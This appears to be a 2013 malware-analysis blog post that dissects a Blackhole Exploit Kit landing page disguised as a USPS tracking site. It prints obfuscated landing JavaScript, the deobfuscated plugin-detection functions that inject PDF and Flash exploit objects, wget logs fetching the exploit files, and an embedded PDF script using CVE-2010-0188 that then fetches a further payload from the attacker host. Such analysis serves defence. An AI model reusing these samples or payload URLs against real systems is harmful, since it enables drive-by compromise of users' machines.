BHEK 2.x with Plugin detect 0.7.9
I saw a tweet for a Virustotal 0/45 and a urlquery.net link so I got curious:
At first glance this looks like a BHEK case to me. This is my first real go at analyzing BHEK so bare with me...
The url from urlquery: hxxp://www5-usps.com/nbh/sends/track.php resolving to 46.166.179.122
Virustotal report 0/31
Lets go and fetch it:
--2013-02-26 23:53:55-- hxxp://www5-usps.com/nbh/sends/track.php
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 22:58:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php'
0K .......... .......... .......... .......... .......... 196K
50K .......... .......... .......... .......... .......... 74.3K
100K ......... 1.09M=0.9s
2013-02-26 23:53:58 (117 KB/s) - `track.php' saved [112216]
This gives us a page with obfuscated JavaScript on it:
(Full page at pastebin) language="javascript">var a = "112:1OO:112:1OO:61:123:11(:1O1:114:115:1O5:111:11O:5(:34:4(:46:55:46:57:34:44:11O:97:1O9:1O1:5(:34:112:1OO:112:1OO:34:44:1O4:97:11O:1OO:1O(:1O1:114:5(:1O2:117:11O:99:116:1O5:111:11O:4O:99:44:9(:44:97:41:123:114:1O1:116:117:114:11O:32:1O2:117:11O:99:116:1O5:111:11O:4O:41:123:99:4O:9(:44:97:41:125:125:44:111:112:1O1:11O:(4:97:1O3:5(:34:6O:34:44:1O5:115:6(:1O1:1O2:1O5:11O:1O1:1OO:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:33:61:34:117:11O:1OO:1O1:1O2:1O5:11O:1O1:1OO:34:125:44:1O5:115:65:114:114:97:121:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:47:97:114:114:97:121:47:1O5:41:46:116:1O1:115:116:4O:79:9(:1O6:1O1:99:116:46:112:114:111:116:111:116:121:112:1O1:46:116:111:(3:116:114:1O5:11O:1O3:46:99:97:1O(:1O(:4O:9(:41:41:125:44:1O5:115:7O:117:11O:99:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:1O2:117:11O:99:116:1O5:111:11O:34:125:44:1O5:115:(3:116:114:1O5:11O:1O3:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:125:44:1O5:115:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:32:116:121:112:1O1:111:1O2:32:9(:61:61:34:11O:117:1O9:9(:1O1:114:34:125:44:1O5:115:(3:116:114:7(:117:1O9:5(:1O2:117:11O:99:116:1O5:111:11O:4O:9(:41:123:114:1O1:116:117:114:11O:4O:116:121:112:1O1:111:1O2:32:9(:61:61:34:115:116:114:1O5:11O:1O3:34:3(:3(:4O:47:92:1OO:47:41:46:116:1O1:115:116:4O:9(:41:41:125:44:1O3:1O1:116:7(:117:1O9:(2:1O1:1O3:12O:5(:47:91:92:1OO:93:91:92:1OO:92:46:92:95:44:45:93:42:47:44:115:112:1O(:1O5:116:7(:117:1O9:
:
:
Lets run it through jsbeautifier.org to clean it up:
(Fully beautified page at pastebin)if (window.document)
function c() {
for (i = 0, s = ""; i < a.length; i++) {
s += String["f" + "r" + "o" + "mCh" + "arC" + ff](a[i]);
}
}
if (window.document) csq = function () {
z(s);
};
try {
document.body ^= 2
} catch (q) {
xc = 1;
if (q) e = eval;
rr = "rep" + "la" + "ce";
doc = document;
}
try {
doc["body"] %= 2
} catch (q) {
ff = "ode";
}
try {
gewh = 1;
} catch (sav) {
xc = false;
}
vvz = "\\(";
var a = "112:100:112:100:61:123:11(:101:114:115:105:111
Decoding this will give us the following most interseting parts:
wepawet link
Hello plugin detect 0.7.9
pdpd = {
version: "O.7.9",
name: "pdpd",
handler: function(c, b, a) {
return function() {
c(b, a)
}
:
:
function x(s) {
d = [];
for (i = O; i < s.length; i++) {
k = (s.charCodeAt(i)).toString(33);
d.push(k);
};
return d.join(":");
}
:
:
function j1() {
return true;
}
function j2() {
return true;
}
function p1() {
var d = document.createElement("object");
d.setAttribute("data", "/nbh/sends/track.php?wxgnkiyn=" + x("8fa62") + "&ynis=" + x("ymg") + "&sspcu=3O:3O:33:1k:1h:31:2v:1n:1l:1h&pie=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
function p2() {
var d = document.createElement("object");
d.setAttribute("data", "/nbh/sends/track.php?zaigqae=" + x("8fa62") + "&xtdgebs=" + x("j") + "&qbthq=3O:3O:33:1k:1h:31:2v:1n:1l:1h&yphqibh=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);
}
function p3() {
return false;
}
function f1() {
var oSpan = document.createElement("span");
document.body.appendChild(oSpan);
var url = "/nbh/sends/track.php?pbf=" + x("8fa62") + "&jsttgj=" + x("nikbgp") + "&gbtov=3O:3O:33:1k:1h:31:2v:1n:1l:1h&info=O2e6b1525353caa8ad5555554daf57575452ac31b4b5afb531bOaa5534b73153ac55533O36b4ac51b252ca3556b1cf4f7e7af15O6acc";
oSpan.innerHTML = "<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-44455354OOOO' id='asd' width='6OO' height='4OO' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='" + url + "' /><embed src='" + url + "' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function ff2() {
return false;
}
:
:
We have now the functions that makes the calls for the PDF's and Flash files.
There is little obfuscation left now, so by running the x() function to get output the missing strings, we can now get the full URL's needed to fetch the PDF files and the Flash file. These parameters are needed to get the files that will exploit out client.Lets fetch the exploit files:
Adobe 8.0 as input to p1():
Virustotal report 21/46
--2013-02-27 00:01:47-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:06:04 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Accept-Ranges: bytes
Content-Length: 9874
Content-Disposition: inline; filename=c516a.pdf
Length: 9874 (9.6K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l'
0K ......... 100% 114K=0.08s
2013-02-27 00:01:52 (114 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f:1d:1f:1d:1j:1k:1l' saved [9874/9874]
Adobe 8.0 as input to p1():
--2013-02-27 00:14:32-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:18:49 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Content-Length: 20065
ETag: "c6c16a19dfb3210cd8d680eef3a24429"
Last-Modified: Tue, 26 Feb 2013 23:17:43 GMT
Accept-Ranges: bytes
Length: 20065 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f'
0K .......... ......... 100% 91.2K=0.2s
2013-02-27 00:14:37 (91.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1f' saved [20065/20065]
Adobe 8.1 as input to p1():
--2013-02-27 00:15:39-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:19:59 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Content-Length: 20053
ETag: "e03b272d4c3f1b6dd29e5ae5c4e69c28"
Last-Modified: Tue, 26 Feb 2013 23:18:52 GMT
Accept-Ranges: bytes
Length: 20053 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g'
0K .......... ......... 100% 117K=0.2s
2013-02-27 00:15:47 (117 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1n:1d:1g' saved [20053/20053]
Adobe 7.0 as input to p1():
--2013-02-27 00:19:33-- hxxp://www5-usps.com//nbh/sends/track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:23:49 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Content-Length: 20041
ETag: "dca06b8cac6d323ef4819ebb35713352"
Last-Modified: Tue, 26 Feb 2013 23:22:43 GMT
Accept-Ranges: bytes
Length: 20041 (20K) [application/pdf]
Saving to: `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f'
0K .......... ......... 100% 88.2K=0.2s
2013-02-27 00:19:37 (88.2 KB/s) - `track.php?wxgnkiyn=1n:33:2v:1l:1h&ynis=3m:3a:34&sspcu=30:30:33:1k:1h:31:2v:1n:1l:1h&pie=1m:1d:1f' saved [20041/20041]
Adobe 8.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:23:46-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:27:59 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Accept-Ranges: bytes
Content-Length: 10838
Content-Disposition: inline; filename=6ed41.pdf
Length: 10838 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f'
0K .......... 100% 83.6K=0.1s
2013-02-27 00:23:47 (83.6 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1n:1d:1f' saved [10838/10838]
Adobe 9.0 as input to p2():
Virustotal report 21/46
--2013-02-27 00:26:30-- hxxp://www5-usps.com/nbh/sends/track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:30:53 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.4.12
Accept-Ranges: bytes
Content-Length: 10815
Content-Disposition: inline; filename=7453e.pdf
Length: 10815 (11K) [application/pdf]
Saving to: `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f'
0K .......... 100% 123K=0.09s
2013-02-27 00:26:41 (123 KB/s) - `track.php?zaigqae=1n:33:2v:1l:1h&xtdgebs=37&qbthq=30:30:33:1k:1h:31:2v:1n:1l:1h&yphqibh=1o:1d:1f' saved [10815/10815]
Flash f1():
Virustotal report 10/46
--2013-02-27 00:31:24-- hxxp://www5-usps.com/nbh/sends/track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc
Resolving www5-usps.com... 46.166.179.122
Connecting to www5-usps.com|46.166.179.122|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 26 Feb 2013 23:35:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.12
Length: unspecified [text/html]
Saving to: `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc'
0K .. 121M=0s
2013-02-27 00:31:32 (121 MB/s) - `track.php?pbf=1n:33:2v:1l:1h&jsttgj=3b:36:38:2w:34:3d&gbtov=30:30:33:1k:1h:31:2v:1n:1l:1h&info=02e6b1525353caa8ad5555554daf57575452ac31b4b5afb531b0aa5534b73153ac55533036b4ac51b252ca3556b1cf4f7e7af1506acc' saved [2671]
Happy to get the files :) but no time to analyze them further at the time :(
Update 2013-02-28
I got time to look more into this case and lets start looking into the PDFs:
Lets see if the files hide something we could look more into,
c516a.pdf:
statistics:
c516a.pdf:
statistics:
Comment: 4 XREF: 1 Trailer: 0 StartXref: 0 Indirect object: 26 11: 52, 6, 18, 19, 20, 21, 22, 28, 31, 32, 48 /Annot 1: 15 /Catalog 1: 1 /EmbeddedFile 6: 41, 42, 99999, 44, 45, 46 /Font 3: 14, 27, 29 /FontDescriptor 1: 30 /Page 1: 8 /Pages 1: 2 /Pattern 1: 13
lets look more into object 99999
obj 99999 0Type: /EmbeddedFile Referencing: Contains stream <</Length1313 / Filter / FlateDecode / Type / EmbeddedFile >>
<< /Length 1313 /Filter / FlateDecode / Type / EmbeddedFile >>
< template > < subform name = "form1"layout = "tb"locale = "ru_RU" > < pageSet > < pageArea > < contentArea h = "10.5in"w = "8in"x = "0.25in"y = "0.25in" > < /contentArea><medium long="11in" short="8.5in" stock="letter"></medium > < /pageArea></pageSet > < subform h = "10.5in"w = "8in" > < field h = "98.425mm"name = "ImageField1"w = "28.575mm"x = "95.25mm"y = "19.05mm" > < ui > < imageEdit > < /imageEdit></ui > < event activity = "initialize"xmlns: xfa = "http://testset.com" > < xfa: script contentType = 'application/x-javascript' > p = parseIn & #116;;a= & quot;53 * * ^ !@# * * 48 * * 4P * * 1L * * 4N * * ^ !@# * * 48 * * 4B * * 4B * * 4G * * ^ !@# * * 4L * * 4E * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 49 * * ^ !@# * * 49 * * 49 * * 27 * * 1L * * ^ !@# * * 4A * * 4A * * 4A * * 27 * * ^ !@# * * 1L * * 4B * * 4B * * 4B * * ^ !@# * * 27 * * 1L * * 4C * * 4C * * ^ !@# * * 4C * * 27 * * 1L * * 4D * * ^ !@# * * 4D * * 4D * * 27 * * 1L * * ^ !@# * * 4E * * 4E * * 4E * * 27 * * ^ !@# * * 1L * * 4F * * 4F * * 4F * * ^ !@# * * 2M * * 53 * * 48 * * 4P * * ^ !@# * * 1L * * 4N * * 4M * * 4G * * ^ !@# * * 4L * * 51 * * 4C * * 4P * * ^ !@# * * 50 * * 46 * * 48 * * 27 * * ^ !@# * * 1L * * 4G * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 55 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 56 * * ^ !@# * * 1L * * 2O * * 1L * * 4L * * ^ !@# * * 4C * * 54 * * 1L * * 32 * * ^ !@# * * 4P * * 4P * * 48 * * 56 * * ^ !@# * * 23 * * 24 * * 2M * * 53 * * ^ !@# * * 48 * * 4P * * 1L * * 46 * * ^ !@# * * 4J * * 2C * * 2O * * 1N * * ^ !@# * * 2F * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2G * * 2C * * 2I * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 4A * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 4D * * 2H * * 2E * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 48 * * 2E * * 4C * * 49 * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2E * * 2B * * 2D * * 2B * * ^ !@# * * 2J * * 2D * * 2F * * 48 * * ^ !@# * * 2H * * 4C * * 2D * * 4D * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2D * * 2H * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2C * * 2D * * 2E * * 2K * * ^ !@# * * 2J * * 2B * * 2F * * 48 * * ^ !@# * * 2H * * 2F * * 2D * * 2B * * ^ !@# * * 2H * * 2B * * 2B * * 4D * * ^ !@# * * 2B * * 2B * * 2B * * 2F * * ^ !@# * * 2B * * 2B * * 2B * * 2B * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 2F * * 2C * * 2F * * 2C * * ^ !@# * * 1N * * 26 * * 1N * * 2B * * ^ !@# * * 2B * * 2B * * 2B * * 4D * * ^ !@# * * 2H * * 49 * * 2H * * 4B * * ^ !@# * * 2H * * 2K * * 2I * * 2C * * ^ !@# * * 2H * * 4B * * 2E * * 2G * * ^ !@# * * 2I * * 2K * * 2I * * 2B * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2I * * 2C * * 2I * * 2D * * ^ !@# * * 2I * * 2H * * 2H * * 2C * * ^ !@# * * 2H * * 48 * * 2H * * 4B * * ^ !@# * * 2E * * 2H * * 2I * * 2F * * ^ !@# * * 2H * * 2F * * 2H * * 4C * * ^ !@# * * 2H * * 4D * * 2H * * 2H * * ^ !@# * * 2D * * 2K * * 2H * * 2C * * ^ !@# * * 2E * * 4B * * 2E * * 2C * * ^ !@# * * 2I * * 2E * * 2I * * 2E * * ^ !@# * * 2H * * 4C * * 2H * * 2J * * ^ !@# * * 2H * * 2D * * 2H * * 2H * * ^ !@# * * 2D * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4C * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2H * * ^ !@# * * 2I * * 2D * * 2E * * 48 * * ^ !@# * * 2E * * 2C * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2J * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 49 * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2E * * ^ !@# * * 2E * * 2E * * 2E * * 48 * * ^ !@# * * 2E * * 2B * * 2E * * 2E * * ^ !@# * * 2E * * 48 * * 2E * * 2B * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 2F * * 2I * * 2B * * ^ !@# * * 2I * * 2I * * 2H * * 48 * * ^ !@# * * 2H * * 2E * * 2I * * 2F * * ^ !@# * * 2I * * 2B * * 2I * * 2J * * ^ !@# * * 2I * * 2H * * 2D * * 48 * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 4A * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 4A * * ^ !@# * * 2H * * 2C * * 2E * * 48 * * ^ !@# * * 2E * * 2J * * 2H * * 2C * * ^ !@# * * 2E * * 48 * * 2E * * 2D * * ^ !@# * * 2E * * 2E * * 2E * * 4B * * ^ !@# * * 2E * * 4B * * 2H * * 2E * * ^ !@# * * 2H * * 48 * * 2I * * 4D * * ^ !@# * * 2E * * 2B * * 2I * * 2J * * ^ !@# * * 2H * * 2B * * 2I * * 4C * * ^ ::a = a.replace.apply(a, [/\^!@#/g, & quot; & quot;]);a = a.replace.apply(a, [/\*\*/g, & quot; & quot;]);s = [];for (i = 0; i & lt; a. & #108;ength;i+= 2) { s.push(p(a. & #115;ubstr(i,2),26)-15);}ss= String. & #102;romCharCode;if(event.target.info.Authors= == null) if (event.target.filesize & gt; (16000, 9000)) { k = ss.apply(String, s); q = "e" + ss.apply(String, [0x76, 0x61]); event.target[q + "l"]( & #107;);}</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>
Pretty ugly stuff here: JavaScript which tries to use CVE 2010-0188.
After exploiting the client it will try to fetch additional payload fromhxxp://www5-usps.com/nbh/sends/track.php?jggg=32:1h:1l:1l:1j&ccb=30:30:33:1k:1h:31:2v:1n:1l:1h&qjqjo=1i&madrmk=fsjuhw&aazds=seyv
Since I left this alone for a couple of days the site was, as expected, not serving me anything anymore so no additional pyload for me.
WepaWet report here
The same method was used for the other PDFs:
6ed41.pdf -> WebaWet
7453e.pdf -> WepAwet
No Java?
I had expected som Java stuff to hit me from the EK as well. But since I went straight for the plugin detect stuff, I missed this code:<applet code="&#OO1O4;&#OO119;" archive="/nbh/sends/track.php">
<param value="Dyy3Ojj" name="val" />
<param value="fa" name="earth" />
<param name="prime" value="___4mKi3iw%tOjo?DjieoMijylV%qw3D3xA.b1hO6DO6-O6-O6CRVeb1fO1fO11O6qO6DO16OhvO6oO6-O6DRCb6.RVObqRAlb-" />
</applet>
Too late to fetch the jar as well.
No comments:
Post a Comment